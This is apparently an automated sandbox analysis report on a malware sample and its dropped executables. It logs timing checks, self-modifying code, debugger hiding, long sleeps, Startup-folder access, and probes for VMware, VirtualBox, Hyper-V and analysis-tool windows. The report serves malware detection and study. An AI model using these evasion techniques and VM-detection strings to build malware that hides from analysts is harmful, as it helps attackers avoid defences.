Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D80B45 second address: 4D80B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F77A0B95E15h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov di, B38Eh 0x00000015 mov al, bh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D80B6D second address: 4D80BB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F77A0BA2871h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F77A0BA286Eh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F77A0BA286Ah 0x00000020 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4D80BB3 second address: 4D80BB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\lIocM276SA.exe	Special instruction interceptor: First address: 33ED77 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\lIocM276SA.exe	Special instruction interceptor: First address: 33EE17 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\lIocM276SA.exe	Special instruction interceptor: First address: 4D843C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\lIocM276SA.exe	Special instruction interceptor: First address: 4E2966 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\lIocM276SA.exe	Special instruction interceptor: First address: 5605F3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 46ED77 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 46EE17 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 60843C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 612966 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 6905F3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Special instruction interceptor: First address: AFEC1B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Special instruction interceptor: First address: CD7806 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Special instruction interceptor: First address: CBC000 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Special instruction interceptor: First address: F7DD03 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Special instruction interceptor: First address: F7B2D2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Special instruction interceptor: First address: 11A2A27 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Special instruction interceptor: First address: D41845 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Special instruction interceptor: First address: D1DD10 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Special instruction interceptor: First address: EB4DF9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Special instruction interceptor: First address: EDD521 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Special instruction interceptor: First address: EBD448 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Special instruction interceptor: First address: F4FAF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Special instruction interceptor: First address: D210F0 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Memory allocated: 11B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Memory allocated: 2DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Memory allocated: 4DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2F40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 3190000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2FA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Memory allocated: 1730000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Memory allocated: 31D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Memory allocated: 1790000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1030000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2CF0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1320000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Memory allocated: 5170000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Memory allocated: 5570000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Memory allocated: 52C0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\lIocM276SA.exe

Code function: 0_2_04DF0C09 rdtsc

0_2_04DF0C09

Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe

Code function: 7_2_05C917E0 smsw word ptr [eax+00h]

7_2_05C917E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Window / User API: threadDelayed 2620

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7900	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7872	Thread sleep count: 53 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7872	Thread sleep time: -106053s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7860	Thread sleep count: 188 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7860	Thread sleep time: -5640000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7896	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7896	Thread sleep time: -74037s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892	Thread sleep time: -98049s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7972	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7884	Thread sleep count: 51 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7884	Thread sleep time: -102051s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7876	Thread sleep count: 50 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7876	Thread sleep time: -100050s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7860	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe TID: 8100	Thread sleep count: 192 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -37000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -36844s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -36701s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -36509s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -36326s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -36087s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -35923s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -35779s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -35591s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -35450s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -35329s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -35187s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -35048s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -34507s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -34172s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -34011s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -33779s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -33634s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -33523s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -33359s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -33202s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -32968s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -32804s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -32626s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -31915s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -31629s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -31377s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -31186s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -31049s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -30909s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -30736s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -30541s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -30403s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -30275s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -30115s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 10320	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe TID: 16164	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 3176	Thread sleep count: 114 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 13788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe TID: 21916	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe TID: 19720	Thread sleep time: -126000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\lIocM276SA.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 37000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36701
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36509
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36326
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36087
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35923
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35329
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34507
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34011
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33523
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33202
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31915
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31629
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31377
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31186
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30909
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30736
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30541
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30403
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

Source: lIocM276SA.exe, 00000000.00000002.1698530610.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmp, 2090621607.exe, 00000038.00000002.3012592598.0000000000C94000.00000040.00000001.01000000.0000000E.sdmp, 0717674af5.exe, 0000004B.00000002.2736298192.00000000010FD000.00000040.00000001.01000000.00000011.sdmp, 2090621607.exe, 0000005F.00000002.3023946765.0000000000C94000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 2090621607.exe, 00000038.00000002.3027024106.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0,
Source: pohtent2.exe, 00000007.00000002.2788675605.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: lIocM276SA.exe, 00000000.00000003.1661416007.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWC7
Source: TypeId.exe, 0000003B.00000002.2616387171.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: skotes.exe, 00000006.00000002.3059247457.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000002.3027024106.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2727527963.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, 0717674af5.exe, 0000004B.00000002.2733720136.0000000000B65000.00000004.00000020.00020000.00000000.sdmp, 0717674af5.exe, 0000004B.00000002.2733720136.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 0000005F.00000003.2937533627.0000000001006000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 0000005F.00000002.3059429528.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 0000005F.00000002.3059429528.0000000001006000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000035.00000002.2567465954.000002602A827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 0717674af5.exe, 0000004B.00000002.2733720136.0000000000B32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: TypeId.exe, 0000003B.00000002.2616387171.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: lIocM276SA.exe, 00000000.00000002.1698530610.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmp, 2090621607.exe, 00000038.00000002.3012592598.0000000000C94000.00000040.00000001.01000000.0000000E.sdmp, 0717674af5.exe, 0000004B.00000002.2736298192.00000000010FD000.00000040.00000001.01000000.00000011.sdmp, 2090621607.exe, 0000005F.00000002.3023946765.0000000000C94000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: InstallUtil.exe, 0000000A.00000002.3193589678.00000000059DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\lIocM276SA.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\lIocM276SA.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\lIocM276SA.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Open window title or class name: ollydbg
